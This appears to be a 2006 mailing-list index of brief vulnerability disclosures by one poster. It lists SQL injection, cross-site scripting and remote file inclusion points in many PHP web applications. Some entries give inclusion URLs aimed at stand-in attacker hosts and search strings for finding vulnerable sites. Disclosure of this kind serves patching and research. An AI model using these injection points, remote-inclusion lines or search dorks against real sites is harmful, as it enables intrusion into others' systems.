Invision Power Board "v1.X & 2.X" SQL Injection

2006-07-05 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /index.php?act=ketqua&code=showcat&idcat=[SQL] /index.php?act=Attach&type=post&id=[SQL] /index.php?act=Profile&CODE=[SQL] /index.php?act=ketqua&code=[SQL] /

Glossaire<<--v1.7 Remote File Include

2006-07-03 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /glossaire/index.php?pa=[evil_script] [EMAIL PROTECTED]

My smiles "browse.php" SQL Injection

2006-06-30 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /mysmiles/browse.php?cat=&count=[SQL] Email:[EMAIL PROTECTED]

Module's Name "Classifieds" SQL Injection

2006-06-30 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /modules.php?name=Classifieds&op=EditAds&id_ads=[SQL] Email:[EMAIL PROTECTED]

CDJ<<--V NITKID 2.0 "category.php" SQL Injection

2006-06-30 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /category.php?cid=[SQL] Search:- Powered by CDJ Version NITKID 2.0 Email:[EMAIL PROTECTED]

MyNewsGroups<<--v. 0.6 "tree.php" SQL Injection

2006-06-30 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /newsgroups/tree.php?grp_id=[SQL] Search:- Powered By MyNewsGroups v. 0.6 Email:[EMAIL PROTECTED]

FreeHost "misc.php & news.php" SQL Injection

2006-06-30 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /FreeHost/misc.php?readme=[SQL] /FreeHost/news.php?index=[SQL] Search:- Powered By FreeHost Email:[EMAIL PROTECTED]

AzDGDatingPlatinum<<--v1.1.0 "view.php" SQL Injection

2006-06-28 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /gentemsn/view.php?l=ar&id=[SQL] Email:[EMAIL PROTECTED]

PHP-Nuke Module's Name Sections<<--V3 SQL Injection

2006-06-28 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /modules.php?name=Sections&op=viewarticle&artid=[SQL] Email:[EMAIL PROTECTED]

vCard PRO SQL Injection

2006-06-28 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Example:- /gbrowse.php?cat_id=[SQL] /rating.php?card_id=[SQL] /create.php?card_id=[SQL] /search.php?event_id=[SQL] Email:[EMAIL PROTECTED]

phpvillage "funshow.php" SQL Injection

2006-06-27 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Email:[EMAIL PROTECTED] Example:- /funshow.php?idn=[SQL]

CrisoftRicette<<--1.0pre15b Remote File Inclusion

2006-06-27 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Email:[EMAIL PROTECTED] Example:- /recipe/cookbook.php?crisoftricette=http://evil_script

WBB<<---v2.0 RC2 "newthread.php" SQL Injection

2006-06-24 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r Example:- /newthread.php?boardid=[SQL

WBB<<---v2.3.1"report.php" SQL Injection

2006-06-23 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r Example:- /report.php?postid=[SQL

WBB<<---v1.2 "showmods.php" SQL Injection

2006-06-23 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r Example:- /showmods.php?boardid=[SQL

RahnemaCo "page.php" Remote File Inclusion[2]

2006-06-20 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r Example:- /shop/page.php?pageid=http://site

Module's Name Content<<--V1.0 SQL injection

2006-06-20 Thread CrAzY . CrAcKeR
Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r Example:- /modules.php?name=Content&am

Module's Name Downloads <<--V 7 SQL injection

2006-06-20 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:- /modules.php?name

vBulletin<<--v3.5.X "member.php" Cross Site Scripting

2006-06-20 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:- /vb/member.php?u=[XSS

SaphpLesson<<--1.1 "misc.php" SQL injection

2006-06-19 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:- /misc.php?action=[SQL

VBZooM <<--V1.00 "lng.php" SQL injection

2006-06-19 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:- /lng.php?QuranID=[SQL

VBZooM <<--V1.11 "message.php" SQL injection

2006-06-19 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:- /message. php?UserID

VBZooM <<--V1.00 "rank.php" SQL injection

2006-06-19 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:- /rank.php?MemberID

dvdwolf SQL injection/XSS

2006-06-16 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:- /templates

wbb<<--v 2.2.2 "thread.php" SQL injection

2006-06-14 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs = Example:- /wbb2

wbb<<--v 2.1.6 "profile.php" SQL injection

2006-06-14 Thread CrAzY . CrAcKeR
== Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs == Example:- /wbb2

wbb<<--v 2.2.1 "studienplatztausch.php" SQL injection

2006-06-14 Thread CrAzY . CrAcKeR
== Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs == Example

VBZooM <<-- V1.11 "show.php" SQL injection

2006-06-13 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs = Example:- /show.php

Web-CMS <<--1.0 "print.php" SQL injection

2006-06-13 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs = Example:- /cms

VBZooM <<--V1.01 "language.php" SQL injection

2006-06-13 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs = Example

VBZooM <<--V1.11 "subject.php" SQL injection

2006-06-13 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs = Example:- /subject.php

VBZooM <<--V1.02 "meaning.php" SQL injection

2006-06-13 Thread CrAzY . CrAcKeR
= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Sw33t h4ck3r Brh-BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs = Example:- /meaning.php

Calendar Express 2 SQL injection

2006-06-07 Thread CrAzY . CrAcKeR
== DISCOVERED BY: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs == Example: /print/month.php?cid=&catid=[SQL] /p

Vice Stats 0.5b SQL injection

2006-06-07 Thread CrAzY . CrAcKeR
=== DISCOVERED BY: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs === Example:- /vs_resource.php?ID=[SQL

SMS "messages.php" SQL injection

2006-06-04 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-BoNy_m Brh-Rootshil-LiNuX_rOOt-SauDiVirUS === Example:- /messages.php?id=[SQL

newsfactory Cross Site Scripting & SQL injection

2006-06-02 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-BoNy_m Brh-Rootshil-LiNuX_rOOt-SauDiVirUS === Example:- /vorstellung.php?id=[sql] /vorstellung.php

northstudio Cross Site Scripting Vulnerability

2006-06-02 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-BoNy_m Brh-Rootshil-LiNuX_rOOt-SauDiVirUS === Example:- /rpt_menu.php?mnuId=[XSS

WBB<--v2.3.4"misc.php" SQL injection Vulnerability

2006-05-30 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Brh-LiNuX_rOOt-BoNy_m-rootshill === Example:- /misc.php?action=faq?sid=[SQL injection

NorthStudio Cross Site Scripting Vulnerability

2006-05-30 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Brh-LiNuX_rOOt-BoNy_m-rootshill === Example:- /rpt_menu.php?mnuId=[XSS] Search:- Powered by northStudio

Bratpack Cross Site Scripting Vulnerability

2006-05-30 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Brh-LiNuX_rOOt-BoNy_m-rootshill === Example:- /projects.php?TaalId=[XSS

4nNukeWare<--V 0.91 SQL Injection exploits

2006-05-30 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Brh-Rootshil-LiNuX_rOOt-BoNy_m === Example:- modules.php?name=4nForum&file=viewthread&

VARIOMAT(advanced cms tool)SQL injection/XSS

2006-05-29 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com nono225-mHOn-rageh-LoverHacker Brh-LiNuX_rOOt-BoNy_m-rootshill === Example:- /news.php?mode=single&view=act&item=76&subcat=[SQL] /news.php?mode=single&a

4images<-- 1.7.1 SQL Injection

2006-05-01 Thread CrAzY . CrAcKeR
>>>>>>>---<<<<<<< foud by CrAzY CrAcKeR Site:http://www.alshmokh.com >>>>>>>---<<<<<<< Bug is found in this script 4images 1.7.1 DB Error: Bad SQL Query: SELECT cat_id, cat_name

poll.pl<--remote commands execution exploit

2006-04-29 Thread CrAzY . CrAcKeR
Subject:poll.pl<--remote commands execution - foud by:CrAzY CrAcKeR ...alshmokh team... Site: http://www.alshmokh.com - Bug is found in this script: open (HAND,"/web/htdocs/ronpoll/question") || die "Error opening file pol

vbulletin<--3.0.x SQL Injection

2006-04-24 Thread CrAzY . CrAcKeR
>>>>>>>>>>>>>--------<<<<<<<<<<<<< foud by:::.CrAzY CrAcKeR..:::..alshmokh team..::: Site: http://www.alshmokh.com nono225-mHOn-rageh-port-LoVeR HaCkEr-Brh-LiNuX-r00t >>>>>>>&

axoverzicht.cgi<==Remote File Inclusion

2006-04-20 Thread CrAzY . CrAcKeR
foud by.CrAzY CrAcKeR.: Site: http://www.alshmokh.com nono225-mHOn-rageh-port-Lover hacker-Brh # ---example: http://[target].com/path/axoverzicht.cgi?maand=http://evilsite google: inurl:"axoverzicht.cgi?maand";